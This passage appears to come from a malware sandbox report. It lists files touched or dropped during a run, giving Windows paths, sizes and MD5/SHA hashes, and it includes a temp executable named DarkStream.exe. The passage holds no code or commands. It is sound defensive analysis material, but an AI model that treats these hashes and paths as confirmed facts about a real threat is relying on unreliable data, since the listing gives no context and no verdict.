83f5edae1f32c9f3b403ba6e2b6ae96cb4e797ba3213dac9c722357eaa738a6b

SHA512
915a608680fbbf576e721f70b8a9b124163ed334b471e7a3c36255a7b8fb4d270a5ade15b7b4f659078ddd095b33295a147916d1e3ec91c5d26183a5e712bd72

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_3

Filesize
4.0MB

MD5
c49d5acfe025c087265b26b54f51eef5

SHA1
d99c3b722ca89cdbfbcb7c824061c35349b82a38

SHA256
640bc06f5fe24caa2962cea32ae71de48e053ec5cf74902f3f55930b25775f59

SHA512
ebad877de481f0988bfe1861670ad018ae2a53b2af6c307154b6c6a51753c305c3f2d672de3f7dd103858d5edb81f2a5fab07d3dac588ec1e6356bbfcd336635

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version

Filesize
14B

MD5
ef48733031b712ca7027624fff3ab208

SHA1
da4f3812e6afc4b90d2185f4709dfbb6b47714fa

SHA256
c9ce8dbbe51a4131073db3d6ceef1e11eaca6308ad88a86125f221102d2cee99

SHA512
ce3a5a429e3796977a8019f47806b8c0671b597ead642fcbfbe3144e2b8112d35a9f2250896b7f215d237d0d19c5966caf3fe674165a6d50e14cb2b88c892029

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
126KB

MD5
12db6f5b41f73cf94957bbf83cd113f8

SHA1
c3818b64f4cade6e2aa6f027aff86897b09e0a45

SHA256
0f57dcb41ba1f366c576c0479de737d84846812e5e08090e23f313cdb5355192

SHA512
3160b6b37d06323dfad4359ec10a38ab934267446d35e732a90743101dcfc7dccc7c06e288c88e7894d324ccc76d45bce70bf0590dfdc9e715d636c489118583

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
245KB

MD5
a0a44797d81a7995bf7a8b6cc937352d

SHA1
5b7081cf91f7343ed28ac7f0d4da3af975b8d8ec

SHA256
b6f07f7e1b0403a6e881f012eb8ba7b2691fa2edda2e2ca7db5d120eb5a2754b

SHA512
1f246193dd658d0b50fb437c31cd96d1cb727e7da49792cbb18abeafcb2b3612a47b8536debba42618ae8ec76a80eb723937450730615fb4e270c17fde05e156

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
126KB

MD5
076e304608970510e3572e9a42e9f3f2

SHA1
322741de4defdc8cdb1914f58a54bc51f479f702

SHA256
4442ed18c32c7784452f0b93bcf62788d611bfac20c649a7911e37417bec695e

SHA512
337e95c3cf713770e12f6d6860bb0b81221ca4cb0491819a06c853eb89ec3103d8f8742f63df3c01bc2a2949b6dd7098af5877398aa52e77b847861cf52b3a7a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
126KB

MD5
db6237c04cd9f7b3d8f855a2c5b2782e

SHA1
84ae2eb6b67ff7ac0502d5ea9f240afd89a26245

SHA256
f99aea4879a365d9f0751d1e4f0a3f8fb9cf1310afd4fc492831c5929c588adb

SHA512
785913e2802a7111f9182d8371c462c874fae0fe5d8ce0aeef189681cc0b9d563ce2da94a23dade628203590b7c2b60bad5c4d16f26d02cf3133ef08b883c0be

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
126KB

MD5
a25b3046d0cda4a3a0db74e583ff47a4

SHA1
45550ac6d27097688b2dab5f2371bea7565a48ac

SHA256
08d0766d7fcc48323c32636107687b246da53e618b979611c97fc5f4ce68522c

SHA512
723a5b4e5737f1f8628b1db53230f1c1859d4eb53526514e69d8df7c1158e943cf5bcbe73bbc3534578ba1f3e1238845ddf4e492bf3ca4c26cc3f450ba7e41cc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
126KB

MD5
f8065e8677ba315f26d7ffd6a8b98c58

SHA1
7bce60585f130aa982971b3bb4aa2816eff71c5c

SHA256
3beb9b6300f410b7ceb9ec80cd6216e0f1583efc1ac328b6fbc22cf2249deb84

SHA512
270d800214212035093da7127ec9ff098abbe163cfa6367a372dba8d89ee17563f4e31df98176b0fcc64775f05c34562a5887e5d327a74d4d1d7b00a35feb313

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
126KB

MD5
fbaca66f47d781cd41d997ddeda49d87

SHA1
8b7fc1244dd5a38ba96c21e1aea9254c01af0fd4

SHA256
8458469d94d31ca3fe8f6f4be638705afdbbe4d57f0b994a4b517b1cc9737c3c

SHA512
95a84f98e0e34d5107c3df2bdbb5a82ae69c0db8b3e992abee5d0c322c89bf95cf63dec47412ae9157ada7608f5efc72580ef12eb28633f387ff4931f4244f2b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
126KB

MD5
35d96210e98b7b8b90e39f8f8efb8f7c

SHA1
f56e282b4dc7ee80fec0065310dcb313f9126aaf

SHA256
21e8dd42f1ab271e7341570b3627c0439dfa595ebb62a26b70faf09f188188e8

SHA512
62e661dc472849dc0fb89193055c97507e53b6d8e93037050475685f07bb59ea99a631a6edfb9afe83e7b61b9520c47a7056644a40df0114fbdf34a373261b60

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
126KB

MD5
12cf2765addbfcfabd0adb1432cbeeab

SHA1
feca6b804d850ac6b65f8d78ce11c02ec46077f1

SHA256
fc4030f6504aba9b600ce61564e894d92ba66898b8d73d532ade4271ba05379a

SHA512
1a3476c52c46c129a0fbe8fc598f8a0c011a81fd61ac85e0e3c94b0fb8570f82c64e8fcb88796f4f786e6d1f08057dd24a15ef4b1b9a54543c30b6f606464dc7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
126KB

MD5
e1fbcb9c3b913410fc0de15f5b7082e2

SHA1
4c3e7c9f4c61a93a35e4fec90aec1c042fa08559

SHA256
99d9752f7c5e0abbec6270d733d8b82e7e2cecd35c8958d75234fe548f72a3f3

SHA512
e05a4d65abcf3ef65964d0dcf9e49c923112eb8b691daf32961c6fccd6428886b501a58a98ec5a6ca0d7a5668be774e725c673b870086da2ecb9a3956a1a4763

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations

Filesize
86B

MD5
961e3604f228b0d10541ebf921500c86

SHA1
6e00570d9f78d9cfebe67d4da5efe546543949a7

SHA256
f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed

SHA512
535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a1ea058d6231b47f5bb8557adba13351

SHA1
111dbb6ffff6517e11719a20683fd7f4ef0579d2

SHA256
f5a91a0770c54a1601557b8babfcc7813972275da171c384cc8929d2910a851f

SHA512
e613f481c50b5a7022a763d13ac1b1ebb6a9d4d973de95108d95d23844d9d526d8c90f391493f043e86e22e9a5abd8a3a4cab5f2def248033d0eb9421091889b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
46ec2d399c9d10a0545cb514e47de14e

SHA1
98fc6f3f34f4082b8d81cc50dc571ec06eb454ca

SHA256
f50fff32b15e4b61c3cb18655c3daf46a83556aef1f3ff8d9ed074f298f247a5

SHA512
993b723da7b0ffcaa731a1f06057bf2ebdc2fd518ef8765b4f625b9fd0094cc6abdccfe998d0e6cb760a3e5d6c411b197a47e67c1de5a6ec4315d017a552a2be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
1689d45c4a828ffbb5f8022e73ed39e9

SHA1
81bc90e3fcd23f7328b495505f4af385fe2f2f8b

SHA256
d3bce1b4e5ec5b9a4305f3c6bfc8695fba8d1b5ae3b09ffff2035acfcbcec72d

SHA512
2b3ce67e9a8d73ef489e4407c95d189f3041d79d98099975cfc1cf66bddacb2618c487c3b1fd6f62c5d2d1826a70dc9550d0fe0d4dc63a9df79b697606d829b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e74f07040ffa781e34e73d8432dc34e4

SHA1
21a0b4a47b9b825ee3c0e11523337eb2e948c972

SHA256
b7349ba8deaa61a737b0c654d2a385b2399ffba6adb7cd330ddc674c8bc9ea81

SHA512
1cacd1f28b799879ae8a064b33501e0cac9894cf36632462c09646fe096aa3c72b39e54c3eeb88c1abd5f6314b8e932fe3947279e3de4e78704fb22c35fd439c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
a439f5b4e60ed48fa65ef3840227d689

SHA1
3871cbea14862a72a87fe4f883440c6e85cf5687

SHA256
e8ee5f7fba1639227477355ade13f8de8e455393dab985372c7144a68315767e

SHA512
f8919a17dd5d6650ef1461d980dc7727123181e0878578f75a8cc41ccaf5dc0bd845175e03667ca7673abbf49365a77e6f90f0debd1b5d61e460d3369849af8e

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\19d46815-8211-4ba1-83d0-31c913e1223b.down_data

Filesize
555KB

MD5
5683c0028832cae4ef93ca39c8ac5029

SHA1
248755e4e1db552e0b6f8651b04ca6d1b31a86fb

SHA256
855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

SHA512
aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
23KB

MD5
203b2ca5a2fe1d3878718d1bb3773c8c

SHA1
c93a804898f610a9cc2f0381662861fc4b29aa19

SHA256
15d0f55e1c46a3c7f596c74c720763d650e93ce8b17bcda04ece3e1a1d9f0709

SHA512
d927ab3fb0e8073510bec19270f6c162597906455ab8852b28191e8b7e3535924ac8968afd24d8afa00a262165a93637387d164a366837507ef09fb64964516b

Download Submit
C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\html-language-features\client\dist\node\is-SA26E.tmp

Filesize
263B

MD5
62157d97f181401fd3cdb831a659b72f

SHA1
cae27da6b9b8cfcbbdb69a89aa940b3ed17d77f7

SHA256
bd486e2729be6d1f9b1299e728cabee9a133ffd8644144676b76d266de44e979

SHA512
1fe5634c079ff05b10e153c031d9eb8b063106f0b327c205fdf231845f3980967e11f8c5e94d7fea1dc2b4ea305d43cf5e80a6aeefd83e64d9727cb101ed0350

Download Submit
C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\json-language-features\server\is-HELE5.tmp

Filesize
39B

MD5
13fd4bf74cf2be8e582df89172fd5c43

SHA1
d14bb4302c9f89913859d245ad2f16feb5c9431a

SHA256
d9b82212418bc1f48866ef2ecfe4217d54745af57694ba5df0b01e6ad3e98933

SHA512
fe6f8972a161ff1eaa4eb748f1de523f47f6c7f5bafef607152bb7301c3bec435ec79dd81875e29c99f092368dae58cbf559bd08a8c8517634f8e7334f173c02

Download Submit
C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\licenses\is-JT129.tmp

Filesize
179KB

MD5
575506a8774d119bc036fc34a0a3b08a

SHA1
87864ccab15ab97a8698c1bdaa7db88d7a8dbcdf

SHA256
a8e9fd8d817925e0457587f9252dfd977bf17a4155a7ea67bf230d3283036a79

SHA512
39f515f5f7da39fd6e026cc3f7bbb269a60c635a51338073cf752352635936834280a68c1deb46fdfb263293716bafdc31ef569663175b0bea6385acbc36e24c

Download Submit
C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules\@microsoft\applicationinsights-core-js\is-O4T0S.tmp

Filesize
631B

MD5
d6bd36f686fd435d25f2fc093c70d2ba

SHA1
9cd1dfde85276609358cf9b08865b801647d1bc5

SHA256
88c7bfe272ff8a305c79644131fceb45e09faa1b9cdabd196b4f50b477f0dd20

SHA512
eb758b22aaab89c125074251f1320a4a6a0404d45f8ad64d68aed354a03ca7c073b04b4d45c23fa8d01d90d627d422e74ad60c106f03f0e4a510fb7b60c2377a

Download Submit
C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules\@microsoft\applicationinsights-core-js\is-P5VKS.tmp

Filesize
854B

MD5
5d483bc2a4edb9b663c253e975b0c404

SHA1
18c5a5d1fe7e1190f527e8a0cab5a6bbeea92b5d

SHA256
667450844c99658ea65acb29a73f60504a599cfa40138471e943ed3e5e5bdf41

SHA512
61d86762e9dca8e330e9a05bfef364a013d45878a353247a0fe656b132e74ee86cd1d562a541e5a7859418a48009565d12b8245a8cb336c01317005c23cc511a

Download Submit
C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules\@microsoft\dynamicproto-js\is-22UOD.tmp

Filesize
1KB

MD5
7f571235285d97bbfd3df146c554c260

SHA1
aede5ad1228cf790788df06dd052f91e0d1b8391

SHA256
904dc4d8749877f1dba1cda48200d2462dccbeb7c134d5e4ef6fa75e0198c8fe

SHA512
f32e03ca8847c2f16226377644cfd561bed53fe608484a755dd39909265834918c25f8b600b735617fd15caeab41781176c5b17d0fedfa906a3df5b15eb3a922

Download Submit
C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules\@microsoft\dynamicproto-js\is-Q12QP.tmp

Filesize
2KB

MD5
558a3afce83d0e53014d19717f654349

SHA1
0e8972dc842e81d5f3cf73a5d7c7bfda53fa5ab5

SHA256
dd0376320839eaab4124f03d94447b20e324d9eb19a7ec400dfbd01bc24bab47

SHA512
7a34a2edcf3a44525a304611ac0230b0b2ce0bfa19dd85d47c74a46e879f2ef21bcab647285c656164292f161454eed9d8239cb63fb16ca2348f11db5d3034ac

Download Submit
C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules\@vscode\iconv-lite-umd\is-P9FBQ.tmp

Filesize
1KB

MD5
d4a904ca135bb7bc912156fee12726f0

SHA1
689ec0681815ecc32bee639c68e7740add7bd301

SHA256
c2cfccb812fe482101a8f04597dfc5a9991a6b2748266c47ac91b6a5aae15383

SHA512
1d0688424f69c0e7322aeb720e4e28d9af3b5a7a2dc18b8b198156e377a61a6e05bc824528fca0f8e61ac39b137a028029ff82e5229ad400a3cc22e2bdb687ad

Download Submit
C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules\font-ligatures\node_modules\yallist\is-6I8U6.tmp

Filesize
765B

MD5
82703a69f6d7411dde679954c2fd9dca

SHA1
bb408e929caeb1731945b2ba54bc337edb87cc66

SHA256
4ec3d4c66cd87f5c8d8ad911b10f99bf27cb00cdfcff82621956e379186b016b

SHA512
3fa748e59fb3af0c5293530844faa9606d9271836489d2c8013417779d10cc180187f5e670477f9ec77d341e0ef64eab7dcfb876c6390f027bc6f869a12d0f46

Download Submit
C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules\get-system-fonts\is-2M963.tmp

Filesize
1KB

MD5
48f746785d13ed477ca30d5c51a4c4e6

SHA1
d13f2bfcfa7a060b06a04ee994d169e881029bca

SHA256
5c15db361b74f2f3fcbc4bbf0c6c62f781d491493a8be312f3147edfb0bb4fdc

SHA512
602f8d4bda9fe8d1663246015754db4797709ef836caf61f1ae388312232f3795c2354b8481d57876053b59797f09e147fe20a274e439b72c82761096cdcd804

Download Submit
C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules\get-system-fonts\is-7RVQE.tmp

Filesize
608B

MD5
ca2429de1d04b8f8ec219352b058d58e

SHA1
312f5876880afe956e8e5427d205253519ca8d0f

SHA256
5a926f15d47257e382ac5e82aedc2f41a009ce6a74735b8cb8b554fab45435bc

SHA512
8135d90e36bd1fd6e734c7abc84611154bb2ea1c5c4a177aeac63adb65b7ecbcf6c29973b37a009c1f99e5c7c60906911903c4486024c320532eb489461adcbc

Download Submit
C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules\get-system-fonts\is-ID76K.tmp

Filesize
312B

MD5
4eeffb9111b31ec10b006aa5476bdc02

SHA1
b5d1a9cc9e48f086593bbc8c60cf317f18dedd7b

SHA256
e232c0453d8aa680d2963d574596cc8d1d4f6df26241f75bea184fcf44b0d639

SHA512
9bfc9a1df5d465de6a9cc5eef83ad64a878bde421644fcb0dbf4a8b8c0f6b7724f6051cb2065b17c832c55f2931467b1509c55fac841b4c5bb8390a15e8a4c3b

Download Submit
C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules\is-docker\is-HHMNK.tmp

Filesize
1KB

MD5
d5f2a6dd0192dcc7c833e50bb9017337

SHA1
80674912e3033be358331910ba27d5812369c2fc

SHA256
5c932d88256b4ab958f64a856fa48e8bd1f55bc1d96b8149c65689e0c61789d3

SHA512
d1f336ff272bc6b96dc9a04a7d0ef8f02936dd594f514060340478ee575fe01d55fc7a174df5814a4faf72c8462b012998eca7bb898e3f9a3e87205fb9135af2

Download Submit
C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules\is-number\is-D672A.tmp

Filesize
1KB

MD5
0f64900f8f30e53054962c9f1fc3205b

SHA1
6210a5e4e9224b4fc8ef250fe227311daa2bc5ac

SHA256
35bdd8a44339719441900fb50fbefc5e2dca1ca662cbaed7a687de842c8b70f2

SHA512
72392bccd8964c88ec8aa3d815746a2b6a4466d9c7ca8f428d7d0f3e2bb11674ef494ca335c8b255eee5825c087a77bb45a5d60025f318b78a64e19beccd23c7

Download Submit
C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules\kerberos\is-TUGA2.tmp

Filesize
11KB

MD5
86d3f3a95c324c9479bd8986968f4327

SHA1
7df059597099bb7dcf25d2a9aedfaf4465f72d8d

SHA256
c71d239df91726fc519c6eb72d318ec65820627232b2f796219e87dcf35d0ab4

SHA512
dc6b68d13b8cf959644b935f1192b02c71aa7a5cf653bd43b4480fa89eec8d4d3f16a2278ec8c3b40ab1fdb233b3173a78fd83590d6f739e0c9e8ff56c282557

Download Submit
C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules\minizlib\node_modules\yallist\is-4G6G9.tmp

Filesize
8KB

MD5
f0730c76a34cefcb8ac8b20fdd3d1044

SHA1
2b9d967d60fadfc9f15b946dfea21e05b41eb6d3

SHA256
69a10f726d26f8d804a3deaeac89f0106ddfa03d576d13971002fffc8f0e8a56

SHA512
314e2e5eea8678119100acdab251fdb723040d562b34ff373debfdbdad7107399d33c61545d03190207e5c32e5bd85897d526c7582fb2ce4363ec49abf71bb36

Download Submit
C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules\minizlib\node_modules\yallist\is-M5E8I.tmp

Filesize
652B

MD5
b15d27bf2cf04083fef9389ce68aa620

SHA1
d6a16b480cbd582f969b3d0ed89a157316268d10

SHA256
c56b604bce814520105739e9559142ea9d4417454ebb933fd5687ca1d8d89bd5

SHA512
bc85712c39269457748b985b9956a6a4c0742976e8e57da32e12f9e3b05c1fc3a916f56d83194376cecaa2b41e0e27cad3725a68e0793e891a0022710f51ced4

Download Submit
C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules\minizlib\node_modules\yallist\is-R53GB.tmp

Filesize
207B

MD5
815f2c408219f81bfc71cf9e216480e0

SHA1
357867d11a5f3f9a52d44300e107ef4b8ceb9830

SHA256
d02451fa396de7f9ec93cc6fb3b07aaa7be637acb3409a9ddebd1c2de9279c1a

SHA512
81d1017d8a57daaf0be2d1d9c28295dfd1a1436aa79a96f0beef8afbccbc7e9ee554685d5cfa5a710b651a7d97a3f928a06a884d12d8ebd780db6c2ee8d7835b

Download Submit
C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules\node-pty\node-addon-api\is-99B9E.tmp

Filesize
3KB

MD5
915de86e0905e07722bd6f5f41f96701

SHA1
1b376be0fa62a8e95195b26aba8b54de87822cd8

SHA256
56904487f34d01f4fa1393ce92032dcf9cdf403bb8cbbdb5a828e3961ff8e3ef

SHA512
b50aa7baea85e0313b2b9e86686b377c49b84213f5b9949151bfcd8a8ee597475023b373b842c176009369df296f3e9b0d1ac76b78907cb83ec3d289aee7be9f

Download Submit
C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules\socks-proxy-agent\is-R0S75.tmp

Filesize
1KB

MD5
e0788eaca177f42808ee36bc32bb522f

SHA1
06000e5076e6e4b51294a87d836817a74c8af65c

SHA256
8d8c55319c7729d57be811c747452636688d54f19701ee0752b6b15ad3771d9a

SHA512
dc037410a930a54ee25a8fdaaa9bcd3c310b9abd81ffd2dc8a75205da44dbe7a1ad1d058d85271e73b7ec5ccf07ccd7109fc6ebbbfc2e2499695515f34392dea

Download Submit
C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules\tas-client-umd\is-KVMVK.tmp

Filesize
1KB

MD5
b98fddd052bb2f5ddbcdbd417ffb26a8

SHA1
03e1fe6fd0bc6d73c3cd3370d5f0a73c4fcb60d6

SHA256
27ebda9d51f0a56b7e281ccd8230a27236dcb51c05f64b07869ecf6e965d68b0

SHA512
7d79aae4c9beb85811a3e122a2b12aad231f519dd12a461ac49d52864a735a6b05a263d433c11ede1406d2e49b6dc62dd38487eb7bd8c079d7198a20cf85fc4d

Download Submit
C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules\vscode-oniguruma\is-B3AM4.tmp

Filesize
2KB

MD5
5061208d6c3443a6e0d7d587a04b4fc3

SHA1
e1e38d82e592ca62732bc6d6fbdbea3e9cf25d28

SHA256
81ed58e26769508df9a2f761dad55b52c6c9de62fff06195b2702fcb7a97e883

SHA512
a27a1bd86fbbcf0d2baba12ff8857abfe08a73563a36493845f45c83d5ab3997a2d28ff61cc6f1a2a289cec90884e4cbbaf9e8405d060971531441acb7d77740

Download Submit
C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules\yazl\is-HVJQ9.tmp

Filesize
1KB

MD5
e62df7ee79458f947161db54ea09ad4d

SHA1
05f44660099e9e996cc01c6b1c276dd4e9a10f5f

SHA256
b303783d5eb7ca50b853ffa5f145e4e7998fab339831d848f507ca6cd970577a

SHA512
8fe80ba23a121b3374d93e164bb80ed47759b39d5a863aa6df32ee294aa95d3d22a4a365636c7603375919e449ef8a1587e354a9d2c2fbf33dd01a33a6ae53bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\DarkStream.exe

Filesize
41KB

MD5
9508d585785419527cc0e253025409dd

SHA1
c59d53b7b282dc965161a82d00361b8b0c496910

SHA256
cca1e9ca639b6bf10f7b43b7b8a30ac6a34dab29c08bb8d6db5724636e17b833

SHA512
940afd2a86e418b64e41d4d484d9dbf0ad10b956948e7122342b2f29ea33a20ae20c5d1a89904a78692a30f465b37d66fa423d7a960b072cba95b735020ad829

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ex2wjyrx.nmu.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir3280_1622524461\7d237dd0-32a4-4c4a-a6d5-442dce073974.tmp

Filesize
150KB

MD5
eae462c55eba847a1a8b58e58976b253

SHA1
4d7c9d59d6ae64eb852bd60b48c161125c820673

SHA256
ebcda644bcfbd0c9300227bafde696e8923ddb004b4ee619d7873e8a12eae2ad

SHA512
494481a98ab6c83b16b4e8d287d85ba66499501545da45458acc395da89955971cf2a14e83c2da041c79c580714b92b9409aa14017a16d0b80a7ff3d91bad2a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir3280_1622524461\CRX_INSTALL\_locales\en_CA\messages.json

Filesize
711B

MD5
558659936250e03cc14b60ebf648aa09

SHA1
32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

SHA256
2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

SHA512
1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

Download Submit
C:\Users\Admin\AppData\Roaming\Code\Cache\Cache_Data\data_0

Filesize
44KB

MD5
fe3168a92d46c9c35ec77f6b15ccc1d8

SHA1
19d27f0ccac29f8c1bd4ee10eda1171b72c7bcad

SHA256
ec1c1ecb577d5d38fd99c3de5414f5ebdcf1dca335ed1e4a98c0d666b018d94a

SHA512
292a24397ac37a543746edd4eb2710572c9bb2b1c59c1609f21f9641756c0811363f3effad36f635a003dc04147d1ce75366793416aeb254bfdae74dd3a821e9

Download Submit
C:\Users\Admin\AppData\Roaming\Code\Cache\Cache_Data\data_1

Filesize
264KB

MD5
a57b1a93058a5ab5fa1418a8a78b3bd9

SHA1
87579768612122ed7c49765277232fafd542421e

SHA256
7a38843e2a1938b844bc67f83e97dfee594a7615cac796e0a5287ac1b55f15c4

SHA512
80373931bc375c0663de510beec44091b68a86e76f7331df81e0c49a9d6db0d8b87d72b4eeb9d01609a004ad45195e1bf096de8b37653f23d9d2650ff53cfa04

Download Submit
C:\Users\Admin\AppData\Roaming\Code\CachedData\6609ac3d66f4eade5cf376d1cb76f13985724bcb\chrome\js\0469ccd2b2a1118a_0

Filesize
290B

MD5
f18fe912dbf877f705f973077b22654a

SHA1
d76ed3c9eac045dc15351f0694a77e4c9cb5ccdf

SHA256
dfd7fffc6930c3fb3a94e7c988898f98ae6cea825932edcc084763f3fb8f0f83

SHA512
757a8cf03dbf3f044de12a9c2081e67be9dc32c9a869556926d280c5253151e6f9ea1e05bcd410c68232a085b48bbb90a7fbfbe28e9438b9884d7e23971f53bd

Download Submit
C:\Users\Admin\AppData\Roaming\Code\CachedData\6609ac3d66f4eade5cf376d1cb76f13985724bcb\chrome\js\c0f1ab47673ee020_0

Filesize
291B

MD5
0f3844e8dba9d48ca016990ba118e076

SHA1
0bcf18430fb11db27bb39f659d8894c5850a073e

SHA256
6586480506ae0a55bae83edf2ed37a7cfdde138c41b696b5ae3d926fa5c4d60b

SHA512
2a1e6aff659ea2abfcc67522f77f2b1f9b6856810cb9b442908fd6c597adeb550bba3f5db0ba94d8fa7218f7ceec86d085aec59e285c0735956a6015be70f30f

Download Submit
C:\Users\Admin\AppData\Roaming\Code\CachedData\6609ac3d66f4eade5cf376d1cb76f13985724bcb\chrome\js\index-dir\the-real-index

Filesize
312B

MD5
31381e875d663e91db6a829067666273

SHA1
6976525c262305bf0c226d3e5cd9db5821d07857

SHA256
29e90f17e039323cf4b2a63b5c6ea4e57cec79e28b3eb3e6c1b2a093a4c52048

SHA512
e644b3ebecc4dc5d07bbbd41665731f0e36ce6eb25e2e6909b895ea7c73587197716188b9db5ec6cdb1ab326053044d740340ff9d4e421e87ef6e7b09b3b68b6

Download Submit
C:\Users\Admin\AppData\Roaming\Code\CachedData\6609ac3d66f4eade5cf376d1cb76f13985724bcb\chrome\js\index-dir\the-real-index

Filesize
48B

MD5
447a580c5e0f0a99a27b5e97789b5c70

SHA1
489d50f53f58c18ac10a86642f10c973c6f589f1

SHA256
d0d2b939af30f4adb9279c4183515e5a7a2a90ba72757a4d81dbd06350f890b0

SHA512
ec7312512529c8cadec8104c62e8ecb948dc87c88c53fba78d3d0bdf48fbda81eb2c8e6d287913fc11f7431322405cfbcce3cca694cc7fd9d68ff7f5507bffea

Download Submit
C:\Users\Admin\AppData\Roaming\Code\CachedData\6609ac3d66f4eade5cf376d1cb76f13985724bcb\chrome\js\index-dir\the-real-index

Filesize
144B

MD5
a80955537310c98605af4a7aa03036eb

SHA1
8f78933e87f10d8a832e4767aa6272991ba380f4

SHA256
cfb7367c51b00ec272b897abbc47bef39f6b7e00be16d386677ade5f5e37fffa

SHA512
ab0f983b3ec32af0d04805517da5dcdcc41a436829872d7f75d88ded5d1570cb88c27f3b940784d66081a237ba13d9a2b8a0cd33f367d227b2f4080d79482844

Download Submit
C:\Users\Admin\AppData\Roaming\Code\CachedData\6609ac3d66f4eade5cf376d1cb76f13985724bcb\chrome\js\index-dir\the-real-index

Filesize
264B

MD5
cb5658ca05dda53252d80b44282915e6

SHA1
bc20bc12b644bd31b623ea30921ad5e97ec0357c

SHA256
d4ab679cf38a73d503e232fd9cbb1e3852dd42b52348f45cbd7d3b8aa64727c8

SHA512
525ad5f7e04c764856ee205ecfeecfd11ddbff43d59fd3b1f171c2fae46d65569948d41a0e054cff9aa24e89b96a5f4d2bed8262920072f0b44570d64e6600bf

Download Submit
